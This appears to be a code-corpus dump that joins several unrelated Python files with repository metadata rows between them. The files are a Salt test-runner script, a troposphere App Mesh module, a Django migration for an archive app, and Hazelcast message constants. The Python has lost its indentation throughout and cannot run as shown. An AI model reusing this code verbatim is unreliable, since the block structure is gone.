action='store_true',
default=False,
help='Run salt-ssh tests. These tests will spin up a temporary '
'SSH server on your machine. In certain environments, this '
'may be insecure! Default: False'
)
self.test_selection_group.add_option(
'--ssh-int',
dest='ssh-int',
action='store_true',
default=False,
help='Run salt-ssh integration tests. Requires to be run with --ssh'
'to spin up the SSH server on your machine.'
)
self.test_selection_group.add_option(
'-A',
'--api',
'--api-tests',
dest='api',
action='store_true',
default=False,
help='Run salt-api tests'
)
self.test_selection_group.add_option(
'--sdb',
'--sdb-tests',
dest='sdb',
action='store_true',
default=False,
help='Run sdb tests'
)
self.test_selection_group.add_option(
'-P',
'--proxy',
'--proxy-tests',
dest='proxy',
action='store_true',
default=False,
help='Run salt-proxy tests'
)
self.test_selection_group.add_option(
'--external',
'--external-api',
'--external-api-tests',
dest='external_api',
action='store_true',
default=False,
help='Run venafi runner tests'
)
self.test_selection_group.add_option(
'--daemons',
'--daemon-tests',
dest='daemons',
action='store_true',
default=False,
help='Run salt/daemons/*.py tests'
)
self.test_selection_group.add_option(
'--scheduler',
dest='scheduler',
action='store_true',
default=False,
help='Run scheduler integration tests'
)
self.test_selection_group.add_option(
'--logging',
dest='logging',
action='store_true',
default=False,
help='Run logging integration tests'
)
self.test_selection_group.add_option(
'--multimaster',
dest='multimaster',
action='store_true',
default=False,
help='Start multimaster daemons and run multimaster integration tests'
)
def validate_options(self):
if self.options.cloud_provider or self.options.external_api:
# Turn on expensive tests execution
os.environ['EXPENSIVE_TESTS'] = 'True'
# This fails even with salt.utils.platform imported in the global
# scope, unless we import it again here.
import salt.utils.platform
if salt.utils.platform.is_windows():
import salt.utils.win_functions
current_user = salt.utils.win_functions.get_current_user()
if current_user == 'SYSTEM':
is_admin = True
else:
is_admin = salt.utils.win_functions.is_admin(current_user)
if self.options.coverage and any((
self.options.name,
not is_admin,
not self.options.run_destructive)) \
and self._check_enabled_suites(include_unit=True):
                warnings.warn("Test suite not running with elevated privileges")
else:
is_admin = os.geteuid() == 0
if self.options.coverage and any((
self.options.name,
not is_admin,
not self.options.run_destructive)) \
and self._check_enabled_suites(include_unit=True):
self.error(
'No sense in generating the tests coverage report when '
'not running the full test suite, including the '
'destructive tests, as \'root\'. It would only produce '
'incorrect results.'
)
# When no tests are specifically enumerated on the command line, setup
# a default run: +unit -cloud_provider
if not self.options.name and not \
self._check_enabled_suites(include_unit=True,
include_cloud_provider=True,
include_proxy=True,
include_kitchen=True,
include_multimaster=True):
self._enable_suites(include_unit=True, include_multimaster=True)
self.start_coverage(
branch=True,
source=[os.path.join(SALT_ROOT, 'salt')],
)
# Print out which version of python this test suite is running on
print(' * Python Version: {0}'.format(' '.join(sys.version.split())))
# Transplant configuration
TestDaemon.transplant_configs(transport=self.options.transport)
MultimasterTestDaemon.transplant_configs(transport=self.options.transport)
def post_execution_cleanup(self):
SaltCoverageTestingParser.post_execution_cleanup(self)
if self.options.clean:
TestDaemon.clean()
def run_integration_suite(self, path='', display_name=''):
'''
Run an integration test suite
'''
full_path = os.path.join(TEST_DIR, path)
return self.run_suite(
full_path, display_name, suffix='test_*.py',
failfast=self.options.failfast,
)
def start_daemons_only(self):
if not salt.utils.platform.is_windows():
self.set_filehandle_limits('integration')
try:
print_header(
' * Setting up Salt daemons for interactive use',
top=False, width=getattr(self.options, 'output_columns', PNUM)
)
except TypeError:
print_header(' * Setting up Salt daemons for interactive use', top=False)
try:
with TestDaemon(self):
print_header(' * Salt daemons started')
master_conf = TestDaemon.config('master')
minion_conf = TestDaemon.config('minion')
proxy_conf = TestDaemon.config('proxy')
sub_minion_conf = TestDaemon.config('sub_minion')
syndic_conf = TestDaemon.config('syndic')
syndic_master_conf = TestDaemon.config('syndic_master')
print_header(' * Syndic master configuration values (MoM)', top=False)
print('interface: {0}'.format(syndic_master_conf['interface']))
print('publish port: {0}'.format(syndic_master_conf['publish_port']))
print('return port: {0}'.format(syndic_master_conf['ret_port']))
print('\n')
print_header(' * Syndic configuration values', top=True)
print('interface: {0}'.format(syndic_conf['interface']))
print('syndic master: {0}'.format(syndic_conf['syndic_master']))
print('syndic master port: {0}'.format(syndic_conf['syndic_master_port']))
print('\n')
print_header(' * Master configuration values', top=True)
print('interface: {0}'.format(master_conf['interface']))
print('publish port: {0}'.format(master_conf['publish_port']))
print('return port: {0}'.format(master_conf['ret_port']))
print('\n')
print_header(' * Minion configuration values', top=True)
print('interface: {0}'.format(minion_conf['interface']))
print('master: {0}'.format(minion_conf['master']))
print('master port: {0}'.format(minion_conf['master_port']))
if minion_conf['ipc_mode'] == 'tcp':
print('tcp pub port: {0}'.format(minion_conf['tcp_pub_port']))
print('tcp pull port: {0}'.format(minion_conf['tcp_pull_port']))
print('\n')
print_header(' * Sub Minion configuration values', top=True)
print('interface: {0}'.format(sub_minion_conf['interface']))
print('master: {0}'.format(sub_minion_conf['master']))
print('master port: {0}'.format(sub_minion_conf['master_port']))
if sub_minion_conf['ipc_mode'] == 'tcp':
print('tcp pub port: {0}'.format(sub_minion_conf['tcp_pub_port']))
print('tcp pull port: {0}'.format(sub_minion_conf['tcp_pull_port']))
print('\n')
print_header(' * Proxy Minion configuration values', top=True)
print('interface: {0}'.format(proxy_conf['interface']))
print('master: {0}'.format(proxy_conf['master']))
print('master port: {0}'.format(proxy_conf['master_port']))
if minion_conf['ipc_mode'] == 'tcp':
print('tcp pub port: {0}'.format(proxy_conf['tcp_pub_port']))
print('tcp pull port: {0}'.format(proxy_conf['tcp_pull_port']))
print('\n')
print_header(' Your client configuration is at {0}'.format(TestDaemon.config_location()))
print('To access the minion: salt -c {0} minion test.ping'.format(TestDaemon.config_location()))
while True:
time.sleep(1)
except TestDaemonStartFailed:
self.exit(status=2)
def start_multimaster_daemons_only(self):
if not salt.utils.platform.is_windows():
self.set_filehandle_limits('integration')
try:
print_header(
' * Setting up Salt daemons for interactive use',
top=False, width=getattr(self.options, 'output_columns', PNUM)
)
except TypeError:
print_header(' * Setting up Salt daemons for interactive use', top=False)
try:
with MultimasterTestDaemon(self):
print_header(' * Salt daemons started')
master_conf = MultimasterTestDaemon.config('mm_master')
sub_master_conf = MultimasterTestDaemon.config('mm_sub_master')
minion_conf = MultimasterTestDaemon.config('mm_minion')
sub_minion_conf = MultimasterTestDaemon.config('mm_sub_minion')
print_header(' * Master configuration values', top=True)
print('interface: {0}'.format(master_conf['interface']))
print('publish port: {0}'.format(master_conf['publish_port']))
print('return port: {0}'.format(master_conf['ret_port']))
print('\n')
print_header(' * Second master configuration values', top=True)
print('interface: {0}'.format(sub_master_conf['interface']))
print('publish port: {0}'.format(sub_master_conf['publish_port']))
print('return port: {0}'.format(sub_master_conf['ret_port']))
print('\n')
print_header(' * Minion configuration values', top=True)
print('interface: {0}'.format(minion_conf['interface']))
print('masters: {0}'.format(', '.join(minion_conf['master'])))
if minion_conf['ipc_mode'] == 'tcp':
print('tcp pub port: {0}'.format(minion_conf['tcp_pub_port']))
print('tcp pull port: {0}'.format(minion_conf['tcp_pull_port']))
print('\n')
print_header(' * Sub Minion configuration values', top=True)
print('interface: {0}'.format(sub_minion_conf['interface']))
print('masters: {0}'.format(', '.join(sub_minion_conf['master'])))
if sub_minion_conf['ipc_mode'] == 'tcp':
print('tcp pub port: {0}'.format(sub_minion_conf['tcp_pub_port']))
print('tcp pull port: {0}'.format(sub_minion_conf['tcp_pull_port']))
print('\n')
print_header(' Your client configurations are at {0}'.format(
', '.join(MultimasterTestDaemon.config_location())))
print('To access minions from different masters use:')
for location in MultimasterTestDaemon.config_location():
print(' salt -c {0} minion test.ping'.format(location))
while True:
time.sleep(1)
except TestDaemonStartFailed:
self.exit(status=2)
def set_filehandle_limits(self, limits='integration'):
'''
Set soft and hard limits on open file handles at required thresholds
for integration tests or unit tests
'''
# Get current limits
if salt.utils.platform.is_windows():
import win32file
prev_hard = win32file._getmaxstdio()
prev_soft = 512
else:
prev_soft, prev_hard = resource.getrlimit(resource.RLIMIT_NOFILE)
# Get required limits
min_soft = MAX_OPEN_FILES[limits]['soft_limit']
min_hard = MAX_OPEN_FILES[limits]['hard_limit']
# Check minimum required limits
set_limits = False
if prev_soft < min_soft:
soft = min_soft
set_limits = True
else:
soft = prev_soft
if prev_hard < min_hard:
hard = min_hard
set_limits = True
else:
hard = prev_hard
# Increase limits
if set_limits:
print(
                ' * Max open files setting is too low (soft: {0}, hard: {1}) '
'for running the tests'.format(prev_soft, prev_hard)
)
print(
' * Trying to raise the limits to soft: '
'{0}, hard: {1}'.format(soft, hard)
)
try:
if salt.utils.platform.is_windows():
hard = 2048 if hard > 2048 else hard
win32file._setmaxstdio(hard)
else:
resource.setrlimit(resource.RLIMIT_NOFILE, (soft, hard))
except Exception as err:
print(
'ERROR: Failed to raise the max open files settings -> '
'{0}'.format(err)
)
print('Please issue the following command on your console:')
print(' ulimit -n {0}'.format(soft))
self.exit()
finally:
print('~' * getattr(self.options, 'output_columns', PNUM))
def run_integration_tests(self):
'''
Execute the integration tests suite
'''
named_tests = []
named_unit_test = []
if self.options.name:
for test in self.options.name:
if test.startswith(('tests.unit.', 'unit.',
'test.kitchen.', 'kitchen.',
'test.multimaster.', 'multimaster.')):
named_unit_test.append(test)
continue
named_tests.append(test)
if (self.options.unit or self.options.kitchen or self.options.multimaster or named_unit_test) \
and not named_tests \
and (self.options.from_filenames or
not self._check_enabled_suites(include_cloud_provider=True)):
# We're either not running any integration test suites, or we're
# only running unit tests by passing --unit or by passing only
# `unit.<whatever>` to --name. We don't need the tests daemon
# running
return [True]
if not salt.utils.platform.is_windows():
self.set_filehandle_limits('integration')
try:
print_header(
' * Setting up Salt daemons to execute tests',
top=False, width=getattr(self.options, 'output_columns', PNUM)
)
except TypeError:
print_header(' * Setting up Salt daemons to execute tests', top=False)
status = []
# Return an empty status if no tests have been enabled
if not self._check_enabled_suites(include_cloud_provider=True, include_proxy=True) and not self.options.name:
return status
try:
with TestDaemon(self):
if self.options.name:
for name in self.options.name:
name = name.strip()
if not name:
continue
if os.path.isfile(name):
if not name.endswith('.py'):
continue
if name.startswith((os.path.join('tests', 'unit'),
os.path.join('tests', 'multimaster'))):
continue
results = self.run_suite(os.path.dirname(name),
name,
suffix=os.path.basename(name),
failfast=self.options.failfast,
load_from_name=False)
status.append(results)
continue
if name.startswith(('tests.unit.', 'unit.',
'tests.multimaster.', 'multimaster.')):
continue
results = self.run_suite(
'', name, suffix='test_*.py', load_from_name=True,
failfast=self.options.failfast,
)
status.append(results)
return status
for suite in TEST_SUITES:
if suite != 'unit' and suite != 'multimaster' and getattr(self.options, suite):
status.append(self.run_integration_suite(**TEST_SUITES[suite]))
return status
except TestDaemonStartFailed:
self.exit(status=2)
def run_multimaster_tests(self):
'''
Execute the multimaster tests suite
'''
named_tests = []
named_unit_test = []
if self.options.name:
for test in self.options.name:
if test.startswith(('tests.multimaster.', 'multimaster.')):
named_tests.append(test)
# TODO: check 'from_filenames'
if not self.options.multimaster and not named_tests:
# We're not running any multimaster test suites.
return [True]
if not salt.utils.platform.is_windows():
self.set_filehandle_limits('integration')
try:
print_header(
' * Setting up multimaster Salt daemons to execute tests',
top=False, width=getattr(self.options, 'output_columns', PNUM)
)
except TypeError:
print_header(' * Setting up multimaster Salt daemons to execute tests', top=False)
status = []
try:
with MultimasterTestDaemon(self):
if self.options.name:
for name in self.options.name:
name = name.strip()
if not name:
continue
if os.path.isfile(name):
if not name.endswith('.py'):
continue
if not name.startswith(os.path.join('tests', 'multimaster')):
continue
results = self.run_suite(os.path.dirname(name),
name,
suffix=os.path.basename(name),
load_from_name=False)
status.append(results)
continue
if not name.startswith(('tests.multimaster.', 'multimaster.')):
continue
results = self.run_suite('', name, suffix='test_*.py', load_from_name=True)
status.append(results)
return status
status.append(self.run_integration_suite(**TEST_SUITES['multimaster']))
return status
except TestDaemonStartFailed:
self.exit(status=2)
def run_unit_tests(self):
'''
Execute the unit tests
'''
named_unit_test = []
if self.options.name:
for test in self.options.name:
if not test.startswith(('tests.unit.', 'unit.')):
continue
named_unit_test.append(test)
if not named_unit_test \
and (self.options.from_filenames or not self.options.unit):
# We are not explicitly running the unit tests and none of the
# names passed to --name (or derived via --from-filenames) is a
# unit test.
return [True]
status = []
if self.options.unit:
            # macOS needs more open file handles for running the unit test suite
self.set_filehandle_limits('unit')
results = self.run_suite(
os.path.join(TEST_DIR, 'unit'), 'Unit', suffix='test_*.py',
failfast=self.options.failfast,
)
status.append(results)
            # We executed ALL unit tests, so we can skip running unit tests by
            # name below
return status
for name in named_unit_test:
results = self.run_suite(
os.path.join(TEST_DIR, 'unit'), name, suffix='test_*.py',
load_from_name=True, failfast=self.options.failfast,
)
status.append(results)
return status
def run_kitchen_tests(self):
'''
Execute the kitchen tests
'''
named_kitchen_test = []
if self.options.name:
for test in self.options.name:
if not test.startswith(('tests.kitchen.', 'kitchen.')):
continue
named_kitchen_test.append(test)
if not self.options.kitchen and not named_kitchen_test:
            # We are not explicitly running the kitchen tests and none of the
            # names passed to --name is a kitchen test.
return [True]
status = []
if self.options.kitchen:
results = self.run_suite(
os.path.join(TEST_DIR, 'kitchen'), 'Kitchen', suffix='test_*.py'
)
status.append(results)
            # We executed ALL kitchen tests, so we can skip running kitchen
            # tests by name below
return status
for name in named_kitchen_test:
results = self.run_suite(
os.path.join(TEST_DIR, 'kitchen'), name, suffix='test_*.py', load_from_name=True
)
status.append(results)
return status
def main(**kwargs):
'''
Parse command line options for running specific tests
'''
try:
parser = SaltTestsuiteParser(
TEST_DIR,
xml_output_dir=XML_OUTPUT_DIR,
tests_logfile=os.path.join(SYS_TMP_DIR, 'salt-runtests.log')
)
parser.parse_args()
# Override parser options (helpful when importing runtests.py and
# running from within a REPL). Using kwargs.items() to avoid importing
# six, as this feature will rarely be used.
for key, val in kwargs.items():
setattr(parser.options, key, val)
overall_status = []
if parser.options.interactive:
if parser.options.multimaster:
parser.start_multimaster_daemons_only()
else:
parser.start_daemons_only()
status = parser.run_integration_tests()
overall_status.extend(status)
status = parser.run_multimaster_tests()
overall_status.extend(status)
status = parser.run_unit_tests()
overall_status.extend(status)
status = parser.run_kitchen_tests()
overall_status.extend(status)
false_count = overall_status.count(False)
if false_count > 0:
parser.finalize(1)
parser.finalize(0)
except KeyboardInterrupt:
print('\nCaught keyboard interrupt. Exiting.\n')
exit(0)
if __name__ == '__main__':
main()
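# Hedged invocation examples (run from the repository root). The suite options are
# taken from setup_additional_options() above; --name comes from the base
# SaltCoverageTestingParser and is assumed to keep that spelling.
#
#     python tests/runtests.py --unit                       # whole unit test suite
#     python tests/runtests.py --name unit.<dotted.path>    # a single named test
#     python tests/runtests.py --state --module             # selected integration suites
#     python tests/runtests.py --interactive                # only start the test daemons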
| 37.022556
| 117
| 0.533255
|
3ff6cd87cb9e80b3f94ee84a92f89bf46287c92b
| 4,912
|
py
|
Python
|
troposphere/appmesh.py
|
sivakarthick169/troposphere
|
ddf147e9a7d62b9d43ac98c4c5926cf8ccd66cf1
|
[
"BSD-2-Clause"
] | null | null | null |
troposphere/appmesh.py
|
sivakarthick169/troposphere
|
ddf147e9a7d62b9d43ac98c4c5926cf8ccd66cf1
|
[
"BSD-2-Clause"
] | null | null | null |
troposphere/appmesh.py
|
sivakarthick169/troposphere
|
ddf147e9a7d62b9d43ac98c4c5926cf8ccd66cf1
|
[
"BSD-2-Clause"
] | null | null | null |
# Copyright (c) 2012-2019, Mark Peek <mark@peek.org>
# All rights reserved.
#
# See LICENSE file for full license.
from . import AWSObject, AWSProperty, Tags
from .validators import integer
class VirtualNodeServiceProvider(AWSProperty):
props = {
'VirtualNodeName': (basestring, True),
}
class VirtualRouterServiceProvider(AWSProperty):
props = {
'VirtualRouterName': (basestring, True),
}
class VirtualServiceProvider(AWSProperty):
props = {
'VirtualNode': (VirtualNodeServiceProvider, False),
'VirtualRouter': (VirtualRouterServiceProvider, False),
}
class VirtualServiceSpec(AWSProperty):
props = {
'Provider': (VirtualServiceProvider, False),
}
class TagRef(AWSProperty):
props = {
'Key': (basestring, True),
'Value': (basestring, False),
}
class VirtualService(AWSObject):
resource_type = "AWS::AppMesh::VirtualService"
props = {
'MeshName': (basestring, True),
'Spec': (VirtualServiceSpec, True),
'Tags': ([TagRef], False),
'VirtualServiceName': (basestring, True),
}
class HealthCheck(AWSProperty):
props = {
'HealthyThreshold': (integer, True),
'IntervalMillis': (integer, True),
'Path': (basestring, False),
'Port': (integer, False),
'Protocol': (basestring, True),
'TimeoutMillis': (integer, True),
'UnhealthyThreshold': (integer, True),
}
class PortMapping(AWSProperty):
props = {
'Port': (integer, True),
'Protocol': (basestring, True),
}
class Listener(AWSProperty):
props = {
'HealthCheck': (HealthCheck, False),
'PortMapping': (PortMapping, True),
}
class DnsServiceDiscovery(AWSProperty):
props = {
'Hostname': (basestring, True),
}
class ServiceDiscovery(AWSProperty):
props = {
'DNS': (DnsServiceDiscovery, True),
}
class FileAccessLog(AWSProperty):
props = {
'Path': (basestring, True),
}
class AccessLog(AWSProperty):
props = {
'File': (FileAccessLog, False),
}
class Logging(AWSProperty):
props = {
'AccessLog': (AccessLog, False),
}
class VirtualServiceBackend(AWSProperty):
props = {
'VirtualServiceName': (basestring, True),
}
class Backend(AWSProperty):
props = {
'VirtualService': (VirtualServiceBackend, False),
}
class VirtualNodeSpec(AWSProperty):
props = {
'Backends': ([Backend], False),
'Listeners': ([Listener], False),
'Logging': (Logging, False),
'ServiceDiscovery': (ServiceDiscovery, False),
}
class VirtualNode(AWSObject):
resource_type = "AWS::AppMesh::VirtualNode"
props = {
'MeshName': (basestring, True),
'Spec': (VirtualNodeSpec, True),
'Tags': ([TagRef], False),
'VirtualNodeName': (basestring, True),
}
class WeightedTarget(AWSProperty):
props = {
'VirtualNode': (basestring, True),
'Weight': (integer, True),
}
class HttpRouteAction(AWSProperty):
props = {
'WeightedTargets': ([WeightedTarget], True),
}
class HttpRouteMatch(AWSProperty):
props = {
'Prefix': (basestring, True),
}
class HttpRoute(AWSProperty):
props = {
'Action': (HttpRouteAction, True),
'Match': (HttpRouteMatch, True),
}
class TcpRouteAction(AWSProperty):
props = {
'WeightedTargets': ([WeightedTarget], True),
}
class TcpRoute(AWSProperty):
props = {
'Action': (TcpRouteAction, True),
}
class RouteSpec(AWSProperty):
props = {
'HttpRoute': (HttpRoute, False),
'TcpRoute': (TcpRoute, False),
}
class Route(AWSObject):
resource_type = "AWS::AppMesh::Route"
props = {
'MeshName': (basestring, True),
'RouteName': (basestring, True),
'Spec': (RouteSpec, True),
'Tags': ([TagRef], False),
'VirtualRouterName': (basestring, True),
}
class EgressFilter(AWSProperty):
props = {
'Type': (basestring, True),
}
class MeshSpec(AWSProperty):
props = {
'EgressFilter': (EgressFilter, False),
}
class Mesh(AWSObject):
resource_type = "AWS::AppMesh::Mesh"
props = {
'MeshName': (basestring, True),
'Spec': (MeshSpec, False),
'Tags': ([TagRef], False),
}
class VirtualRouterListener(AWSProperty):
props = {
'PortMapping': (PortMapping, True),
}
class VirtualRouterSpec(AWSProperty):
props = {
'Listeners': ([VirtualRouterListener], True),
}
class VirtualRouter(AWSObject):
resource_type = "AWS::AppMesh::VirtualRouter"
props = {
'MeshName': (basestring, True),
'Spec': (VirtualRouterSpec, True),
'Tags': (Tags, False),
'VirtualRouterName': (basestring, True),
}
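# A hedged usage sketch, not part of the generated resource definitions above:
# compose a minimal mesh and virtual router into a CloudFormation template.
# Template/add_resource come from the troposphere top-level package; the property
# values are illustrative.
if __name__ == '__main__':
    from troposphere import Template

    template = Template()
    template.add_resource(Mesh('DemoMesh', MeshName='demo-mesh'))
    template.add_resource(VirtualRouter(
        'DemoRouter',
        MeshName='demo-mesh',
        VirtualRouterName='demo-router',
        Spec=VirtualRouterSpec(Listeners=[
            VirtualRouterListener(PortMapping=PortMapping(Port=8080, Protocol='http')),
        ]),
    ))
    print(template.to_json())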
| 20.381743
| 63
| 0.597109
|
315b518a1e2280f713dcc780d7d4b341f77ab3c4
| 10,118
|
py
|
Python
|
archiv/migrations/0001_initial.py
|
acdh-oeaw/mmp
|
7ef8f33eafd3a7985328d374130f1cbe31f77df0
|
[
"MIT"
] | 2
|
2021-06-02T11:27:54.000Z
|
2021-08-25T10:29:04.000Z
|
archiv/migrations/0001_initial.py
|
acdh-oeaw/mmp
|
7ef8f33eafd3a7985328d374130f1cbe31f77df0
|
[
"MIT"
] | 86
|
2021-01-29T12:31:34.000Z
|
2022-03-28T11:41:04.000Z
|
archiv/migrations/0001_initial.py
|
acdh-oeaw/mmp
|
7ef8f33eafd3a7985328d374130f1cbe31f77df0
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.5 on 2021-01-29 10:23
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('vocabs', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Autor',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('legacy_id', models.CharField(blank=True, max_length=300, verbose_name='Legacy ID')),
('legacy_pk', models.IntegerField(blank=True, help_text='Primärschlüssel Alt', null=True, verbose_name='Primärschlüssel Alt')),
('name', models.CharField(blank=True, help_text='Name (de)', max_length=250, verbose_name='Name (de)')),
('name_lat', models.CharField(blank=True, help_text='Name (lat)', max_length=250, verbose_name='Name (lat)')),
('name_en', models.CharField(blank=True, help_text='Name (en)', max_length=250, verbose_name='Name (en)')),
('name_fr', models.CharField(blank=True, help_text='Name (fr)', max_length=250, verbose_name='Name (fr)')),
('name_it', models.CharField(blank=True, help_text='Name (it)', max_length=250, verbose_name='Name (it)')),
                ('jahrhundert', models.CharField(blank=True, help_text='Jahrhundert', max_length=250, verbose_name='Jahrhundert')),
('start_date', models.CharField(blank=True, help_text='von', max_length=250, verbose_name='von')),
('end_date', models.CharField(blank=True, help_text='bis', max_length=250, verbose_name='bis')),
('kommentar', models.TextField(blank=True, help_text='Kommentar', null=True, verbose_name='Kommentar')),
('orig_data_csv', models.TextField(blank=True, null=True, verbose_name='The original data')),
],
options={
'verbose_name': 'Autor',
'ordering': ['legacy_pk'],
},
),
migrations.CreateModel(
name='Edition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('legacy_id', models.CharField(blank=True, max_length=300, verbose_name='Legacy ID')),
('zitat', models.CharField(blank=True, help_text='Zitat', max_length=250, verbose_name='Zitat')),
('orig_data_csv', models.TextField(blank=True, null=True, verbose_name='The original data')),
],
options={
'verbose_name': 'Edition',
'ordering': ['zitat'],
},
),
migrations.CreateModel(
name='KeyWord',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('legacy_id', models.CharField(blank=True, max_length=300, verbose_name='Legacy ID')),
('legacy_pk', models.IntegerField(blank=True, help_text='Primärschlüssel Alt', null=True, verbose_name='Primärschlüssel Alt')),
('stichwort', models.CharField(blank=True, help_text='Stichwort', max_length=250, verbose_name='Stichwort')),
('art', models.CharField(blank=True, help_text='Art des Stichworts', max_length=250, verbose_name='Art des Stichworts')),
('varianten', models.TextField(blank=True, help_text="Varianten, bitte mit ';' trennen", null=True, verbose_name='Varianten')),
('wurzel', models.CharField(blank=True, help_text='Wurzel', max_length=250, verbose_name='Wurzel')),
('kommentar', models.TextField(blank=True, help_text='Kommentar', null=True, verbose_name='Kommentar')),
('orig_data_csv', models.TextField(blank=True, null=True, verbose_name='The original data')),
],
options={
'verbose_name': 'Keyword',
'ordering': ['stichwort'],
},
),
migrations.CreateModel(
name='Ort',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('legacy_id', models.CharField(blank=True, max_length=300, verbose_name='Legacy ID')),
('legacy_pk', models.IntegerField(blank=True, help_text='Primärschlüssel Alt', null=True, verbose_name='Primärschlüssel Alt')),
('name', models.CharField(blank=True, help_text='Name (en)', max_length=250, verbose_name='Name (en)')),
('name_antik', models.CharField(blank=True, help_text='Name (antik)', max_length=250, verbose_name='Name (antik)')),
('name_de', models.CharField(blank=True, help_text='Name (de)', max_length=250, verbose_name='Name (de)')),
('name_fr', models.CharField(blank=True, help_text='Name (fr)', max_length=250, verbose_name='Name (fr)')),
('name_it', models.CharField(blank=True, help_text='Name (it)', max_length=250, verbose_name='Name (it)')),
('long', models.FloatField(blank=True, help_text='Längengrad', null=True, verbose_name='Längengrad')),
('lat', models.FloatField(blank=True, help_text='Breitengrad', null=True, verbose_name='Breitengrad')),
('kommentar', models.TextField(blank=True, help_text='Kommentar', null=True, verbose_name='Kommentar')),
('orig_data_csv', models.TextField(blank=True, null=True, verbose_name='The original data')),
('art', models.ForeignKey(blank=True, help_text='Art des Ortes', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='rvn_ort_art_skosconcept', to='vocabs.skosconcept', verbose_name='Art des Ortes')),
('kategorie', models.ForeignKey(blank=True, help_text='Kategorie des Ortes', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='rvn_ort_kategorie_skosconcept', to='vocabs.skosconcept', verbose_name='Kategorie des Ortes')),
],
options={
'verbose_name': 'Ort',
'ordering': ['legacy_pk'],
},
),
migrations.CreateModel(
name='Text',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('legacy_id', models.CharField(blank=True, max_length=300, verbose_name='Legacy ID')),
('legacy_pk', models.IntegerField(blank=True, help_text='Primärschlüssel Alt', null=True, verbose_name='Primärschlüssel Alt')),
('title', models.CharField(blank=True, help_text='Titel', max_length=250, verbose_name='Titel')),
                ('jahrhundert', models.CharField(blank=True, help_text='Jahrhundert', max_length=250, verbose_name='Jahrhundert')),
('start_date', models.CharField(blank=True, help_text='von', max_length=250, verbose_name='von')),
('end_date', models.CharField(blank=True, help_text='bis', max_length=250, verbose_name='bis')),
('kommentar', models.TextField(blank=True, help_text='Kommentar', null=True, verbose_name='Kommentar')),
('orig_data_csv', models.TextField(blank=True, null=True, verbose_name='The original data')),
('art', models.ForeignKey(blank=True, help_text='Textart', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='rvn_text_art_skosconcept', to='vocabs.skosconcept', verbose_name='Textart')),
('autor', models.ManyToManyField(blank=True, help_text='Autor', related_name='rvn_text_autor_autor', to='archiv.Autor', verbose_name='Autor')),
('edition', models.ManyToManyField(blank=True, help_text='Edition', related_name='rvn_text_edition_edition', to='archiv.Edition', verbose_name='Edition')),
('ort', models.ManyToManyField(blank=True, help_text='Ort', related_name='rvn_text_ort_ort', to='archiv.Ort', verbose_name='Ort')),
],
options={
'verbose_name': 'Text',
'ordering': ['title'],
},
),
migrations.CreateModel(
name='Stelle',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('legacy_id', models.CharField(blank=True, max_length=300, verbose_name='Legacy ID')),
('legacy_pk', models.IntegerField(blank=True, help_text='Primärschlüssel Alt', null=True, verbose_name='Primärschlüssel Alt')),
('summary', models.TextField(blank=True, help_text='Zusammenfassung', null=True, verbose_name='Zusammenfassung')),
('zitat', models.TextField(blank=True, help_text='Zitat', null=True, verbose_name='Zitat')),
('translation', models.TextField(blank=True, help_text='Übersetzung', null=True, verbose_name='Übersetzung')),
('kommentar', models.TextField(blank=True, help_text='Kommentar', null=True, verbose_name='Kommentar')),
('orig_data_csv', models.TextField(blank=True, null=True, verbose_name='The original data')),
('key_word', models.ManyToManyField(blank=True, help_text='Stichwort', related_name='rvn_stelle_key_word_keyword', to='archiv.KeyWord', verbose_name='Stichwort')),
('text', models.ForeignKey(blank=True, help_text='Text', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='rvn_stelle_text_text', to='archiv.text', verbose_name='Text')),
],
options={
'verbose_name': 'Stelle',
'ordering': ['legacy_pk'],
},
),
migrations.AddField(
model_name='autor',
name='ort',
field=models.ForeignKey(blank=True, help_text='Ort', null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='rvn_autor_ort_ort', to='archiv.ort', verbose_name='Ort'),
),
]
| 72.791367
| 258
| 0.622752
|
b076165febf01a27a3eafa5fac980daea882bf7f
| 397
|
py
|
Python
|
hazelcast/protocol/codec/atomic_long_message_type.py
|
buraksezer/hazelcast-python-client
|
4cc593ef7de994bd84fdac8331b81b309cce30a0
|
[
"Apache-2.0"
] | 3
|
2020-05-01T15:01:54.000Z
|
2021-01-27T14:51:45.000Z
|
hazelcast/protocol/codec/atomic_long_message_type.py
|
buraksezer/hazelcast-python-client
|
4cc593ef7de994bd84fdac8331b81b309cce30a0
|
[
"Apache-2.0"
] | null | null | null |
hazelcast/protocol/codec/atomic_long_message_type.py
|
buraksezer/hazelcast-python-client
|
4cc593ef7de994bd84fdac8331b81b309cce30a0
|
[
"Apache-2.0"
] | 1
|
2020-12-01T20:00:35.000Z
|
2020-12-01T20:00:35.000Z
|
ATOMICLONG_APPLY = 0x0a01
ATOMICLONG_ALTER = 0x0a02
ATOMICLONG_ALTERANDGET = 0x0a03
ATOMICLONG_GETANDALTER = 0x0a04
ATOMICLONG_ADDANDGET = 0x0a05
ATOMICLONG_COMPAREANDSET = 0x0a06
ATOMICLONG_DECREMENTANDGET = 0x0a07
ATOMICLONG_GET = 0x0a08
ATOMICLONG_GETANDADD = 0x0a09
ATOMICLONG_GETANDSET = 0x0a0a
ATOMICLONG_INCREMENTANDGET = 0x0a0b
ATOMICLONG_GETANDINCREMENT = 0x0a0c
ATOMICLONG_SET = 0x0a0d
| 26.466667
| 35
| 0.866499
|
7925f8c6eaecdffbabcbfd6eae03c9fb3d087d5f
| 9,167
|
py
|
Python
|
src/healthcareapis/azext_healthcareapis/vendored_sdks/healthcareapis/aio/operations/_workspace_private_link_resources_operations.py
|
Caoxuyang/azure-cli-extensions
|
d2011261f29033cb31a1064256727d87049ab423
|
[
"MIT"
] | null | null | null |
